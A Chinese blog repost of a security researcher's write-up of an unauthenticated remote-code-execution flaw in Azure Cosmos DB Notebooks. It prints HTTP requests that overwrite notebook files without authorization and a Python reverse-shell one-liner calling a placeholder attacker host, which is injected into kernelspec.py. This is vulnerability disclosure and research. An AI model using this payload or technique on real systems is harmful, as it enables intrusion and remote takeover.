【网络安全】远程代码执行之Azure Cosmos DB Notebook

于 2024-07-15 02:27:53 发布
阅读量218 收藏 3
点赞数 9
分类专栏: 网络安全 文章标签: web安全 azure 数据库
该原创文章未经本人许可,不得用于商业用途。未经授权不得转载,否则保留追究法律责任的权利。
本文链接:https://blog.csdn.net/2301_77485708/article/details/140426706
版权

未经许可,不得转载。

文章目录

前言

Azure Cosmos DB Notebook是一个用于在Azure Cosmos DB中进行数据分析和查询的工具。它提供了一个交互式的环境,使用Jupyter Notebook的方式编写和执行查询、分析数据。用户可以在Notebook中编写代码来连接到Azure Cosmos DB的数据库和容器,执行SQL查询、JavaScript代码或者其他支持的语言来操作数据,还可以进行数据可视化、实时数据流处理等操作。

正文

主页面如下:

在这里插入图片描述

创建新的 Notebook 时,存在该请求包:

POST 
/api/controlplane/toolscontainer/cosmosaccounts/subscriptions/[tenant-id]/resourceGroups/Orca-Research/providers/Microsoft.DocumentDB/databaseAccounts/orca-cosmos-dev/containerconnections/multicontainer HTTP/2
Host: tools.cosmos.azure.com
Content-Length: 88
Sec-Ch-Ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"
Authorization: Bearer 
eyJ0eXAiOiJKV1QiLdaaaxxWMFRPSSIsImtpZCI6IjJaUXBKM1VwYmpBWVhZR2FYRUpsOGxWMFRPSSJ9.eyJhdWQddaaam5ldC8yMjdkY2ExZC1
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Accept: /
Origin: https://cosmos.azure.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://cosmos.azure.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-IL,en;q=0.9,he-IL;q=0.8,he;q=0.7,en-US;q=0.6,pl;q=0.5

{"cosmosEndpoint":"https://orca-cosmos-dev.documents.azure.com:443/","poolId":"default"}

The Cosmos DB endpoint that was created manually by the user on portal.azure.com.

返回包如下:

The Cosmos DB endpoint response on portal.azure.com.

可以看到,服务器返回了forwardingId,这个值将会存在于后续请求包的API接口中。

在渗透测试过程中,攻击者的forwardingId为27f180bc-cf93-4c42-b23e-f27a5085da57:

当我们尝试删除授权标头并发送相同的请求时,我们发现不需要授权标头来列出同一台服务器的不同笔记本。

通过测试发现,该接口用于列出同一台服务器的不同notebooks:

https://seasia.tools.cosmos.azure.com:10007/api/containergateway/27f180bc-cf93-4c42-b23e-f27a5085da57(即forwardingId)/api/contents/notebooks

通过删除请求头Authorization并观察返回包可知,该接口存在未授权漏洞:

在这里插入图片描述

经过后续测试,发现全站接口均存在未授权漏洞,即只要知道受害者的forwardingId,就可以利用所有接口,对受害者的notebook进行读写访问修改等操作)。

证明如下:

1、利用/api/containergateway/[forwardingId]/api/kernels/接口获取kernels_id

通过退出笔记本本身(X 符号)检查更新的笔记本,然后点击表 API 标题右侧的刷新按钮来刷新表格/笔记本。

2、Notebook代码覆盖、删除等

在 Notebook 中编写代码:

在这里插入图片描述

保存:

通过 Burp 查看笔记本(Untitled.ipynb)。

请求包如下:

发送上述请求将会给我们以下 ID。

将Get请求修改为PUT请求,并利用返回包内容来构造Json请求体,发送至服务器:

PUT 
/api/containergateway/27f180bc-cf93-4c42-b23e-f27a5085da57/api/contents/notebooks/Untitled.ipynb HTTP/2
Host: [seasia.tools.cosmos.azure.com:1000](<http://seasia.tools.cosmos.azure.com:10005/>)7
Content-Length: 983
Sec-Ch-Ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Origin: [<https://cosmos.azure.com>](<https://cosmos.azure.com/>)
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: [<https://cosmos.azure.com/>](<https://cosmos.azure.com/>)
Accept-Encoding: gzip, deflate
Accept-Language: en-IL,en;q=0.9,he-IL;q=0.8,he;q=0.7,en-US;q=0.6,pl;q=0.5

{"kernel":{"id":null,"name":"python3"},"name":"",
"content": {"cells": [{"cell_type": "code", "execution_count": 1, "id": "47bdbef0-ea14-4960-8789-7983e63312dd", "metadata": {"collapsed": true, "execution": {"iopub.execute_input": "2022-10-02T08:06:27.283Z", "iopub.status.busy": "2022-10-02T08:06:27.277Z", "iopub.status.idle": "2022-10-02T08:06:27.299Z", "shell.execute_reply": "2022-10-02T08:06:27.292Z"}, "jupyter": {"outputs_hidden": false, "source_hidden": false}, "nteract": {"transient": {"deleting": false}}, "trusted": true}, "outputs": [{"name": "stdout", "output_type": "stream", "text": "hacked\\n"}], "source": "print('Hacked!')"}], "metadata": {"language_info": {"file_extension": "ipynb", "mimetype": "application/json", "name": "python", "version": "3.7"}, "nteract": {"version": "dataExplorer 1.0"}}, "nbformat": 4, "nbformat_minor": 5}, "format": "json", "mimetype": null, "size": 993, "writable": true, "path":"notebooks/Untitled.ipynb","type":"notebook"}

Check that the code in the Notebook was overwritten by sending the crafted payload directly to the server.

在浏览器刷新页面后,可以看到请求体内容已将原有Notebook中的代码覆盖:

我们还设法检索任何 Notebook 并在其中删除和注入代码,无论我们是否连接到 Azure,或者仅仅是未经身份验证的用户。

同时,我们也可以执行删除代码等操作。

经过后续测试,我们发现,通过 Azure UI 加载 Cosmos 数据资源管理器时,该api用于构建资源管理器仪表板:

/home/cosmosuser/.local/lib/python3.6/site-packages/jupyter_client/kernelspec.py

当数据资源管理器加载时,整个 Python 代码的这一部分也将被执行,并最终为任何远程攻击者提供客户端的反向 shell。

我们仍然可以覆盖**/home/cosmosuser**目录中的所有文件,包括该kernelspec.py文件。

现将GET请求修改为PUT,并在请求体中添加py文件原始内容及以下反向shell脚本:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"ATTACKER_ID\\",ATTACKER_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\\"/bin/bash\\")

通过发送包含文件原始内容 + RCE 行的 PUT 请求来修改文件。

发送请求并刷新页面后,RCE成功:

刷新数据资源管理器页面后,我们应该得到一个反向 shell。

原文出处:https://orca.security/resources/blog/cosmiss-vulnerability-azure-cosmos-db/

秋说
关注
  • 9
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
azure 入门_Azure Cosmos DB入门
culuo4781的博客
07-18 599
azure 入门 In the past two years, we’ve seen an explosion in growth with document-oriented databases like Azure Cosmos DB. MongoDB – one of the major document databases – went live on the Nasdaq and...
Azure Data Factory】第一篇 入门
qq_41855232的博客
04-23 1503
win 环境变量;
四款微软Azure服务存在漏洞,可导致云资源遭越权访问
smellycat000的专栏
01-20 1328
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士四款不同的微软 Azure服务易受服务器端请求伪造 (SSRF) 攻击,可使攻击者获得对云资源的越权访问权限。这些漏洞是由Orca公司在2022年10月8日至2022年12月2日在Azure API Management、Azure Functions、Azure Machine Learning 和 Azure Digital Twins 中发...
mips汇编代码示例解释_通过示例解释cosmosdb
weixin_26705651的博客
08-12 291
mips汇编代码示例解释Since I’m going to be giving a spiel (or two) about Data and AI at Microsoft Ignite later on this year, I decided it’s about time I stopped ignoring the Data guys and what better way to ge...
azure-cosmosdb-spark:适用于Azure Cosmos DB的Apache Spark连接器
02-03
适用于Apache Spark的Azure Cosmos DB连接器 azure-cosmosdb-spark是和的官方连接器。 该连接器使您可以通过python和scala Apache Spark DataFrames轻松读取和写入Azure Cosmos DB。 它还允许您轻松创建用于批处理,...
MCW-Cosmos-DB-实时-高级分析:MCW CosmosDB实时-高级分析
02-20
Cosmos DB实时高级分析 为商务提供支付处理服务的伍德格罗夫银行(Woodgrove Bank)正在寻求设计和实施创新欺诈检测解决... 该解决方案通过Azure Synapse Link将Azure Cosmos DBAzure Synapse Analytics配合使用,以
ExploreAzureCosmosDB:我对Azure Cosmod DB的实验
02-18
总之,通过Jupyter NotebookAzure Cosmos DB的交互,我们可以轻松地管理数据、执行查询,并了解这个强大数据库服务的核心功能。这个实验将为你提供实践经验,帮助你更好地理解和应用Azure Cosmos DB在实际项目中的...
azureml
03-19
9. **扩展性与集成**: Azure ML可与Azure的其他服务(如Cosmos DB、SQL Server、Event Hubs)以及开源工具(如TensorFlow、PyTorch)无缝集成,提供强大的生态系统。 10. **安全与合规性**: Azure ML遵循微软的云...
azure_hackathon
03-28
2. **数据存储与管理**:Azure 提供了包括Blob Storage(对象存储)、Table Storage、SQL Database和 Cosmos DB 在内的多种数据存储解决方案。开发者可以根据项目的数据类型和访问模式选择合适的存储服务,例如,...
如何用IP地址申请SSL证书实现网络安全
2401_84891336的博客
07-10 408
申请IP地址SSL证书
网络安全防御【防火墙安全策略用户认证综合实验】
miss_copper的博客
07-10 1261
先新建一个管理员角色(网络安全管理员):再新建一个管理员(用户名密码自拟):至此本实验全部结束!!!
7.13实训日志
最新发布
Kidding_Ma的博客
07-13 214
作为一名大学生,我深感有责任在今后的学习和职业生涯中,为推动网络安全技术的发展和应用做出贡献,保障数字化社会的安全和稳定发展。在技术方面,我们学习了多种编程语言和工具的应用,如Python用于爬虫和脚本、Java用于代码审计和漏洞挖掘、C语言用于二进制漏洞挖掘等。会上,专家学者们分享了关于网络安全最新的研究成果和技术应用,以及面临的挑战和未来的发展方向,给我留下了深刻的印象和启发。学习网络安全的过程中,我们深入了解了网络的不同层面和技术,从表层网络到深网再到暗网,以及涉及的产业分类和技术工具。
网络安全——防御实验
Nirvana92的博客
07-09 1091
# 防御实验一 ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/63794e616c244387a03fae34450d6f00.png) #### 拓扑结构展示: ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/eb297641443c4f78b6c93c432e2b5286.png) ## 一、 ### 根据题目,先为办公区做**安全策略**主要策略有以下几点: 1、书写名称和描述,名称和描述要**明确**,让除本人
网络安全法视角下的等保测评法律责任与风险控制
ddcajdkdl的博客
07-11 439
直接责任人员处罚:对于违反网络安全法规定,导致严重后果的,不仅单位要承担责任,直接负责的主管人员和其他直接责任人员也可能被处以罚款,甚至追究刑事责任。该法于2017年6月1日正式实施,其中对网络安全等级保护制度(简称“等保”)做出了明确规定,要求网络运营者根据其网络的重要程度及潜在影响,实施相应级别的安全保护措施。综上所述,从《网络安全法》的角度出发,等保测评不仅是法律规定的强制性要求,也是企业自我保护、规避法律风险、维护信誉和业务连续性的关键措施。
网络安全合规建设
weixin_68864415的博客
07-09 914
简单介绍了企业网络安全合规的问题
网络安全科普】网络安全指南请查收
weixin_45840241的博客
07-09 897
网络安全为人民、网络安全靠人民,维护网络安全是全社会共同的责任,需要政府、企业、社会组织、广大网民共同参与,共筑网络安全防线。但与此同时,互联网领域的问题也日益凸显。网络安全,是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,以及保障网络数据的完整性、保密性、可用性、真实性和可控性的能力。所有刷单都是诈骗,做任务赚佣金不过是刷单诈骗的诱饵,切勿相信“免费送、轻松赚”等兼职广告,不要贪图小便宜,不要轻易点击陌生链接或扫描陌生二维码下载APP。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-04 2053
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全威胁情报到底是什么
学-> 思->用
07-10 292
网络安全威胁情报是提升组织安全态势的重要手段,通过收集和分析各种威胁信息,组织可以更有效地预防、检测和响应网络攻击。威胁情报的构成要素包括指标、TTPs、威胁行为体、漏洞、恶意软件和攻击事件。通过合理应用威胁情报,组织可以增强防御能力、提升事件响应效率,并通过情报共享与合作,共同应对复杂多变的网络威胁。
DP-420微软MCP
03-01
DP-420微软MCP

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏,祝你平安喜乐。

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值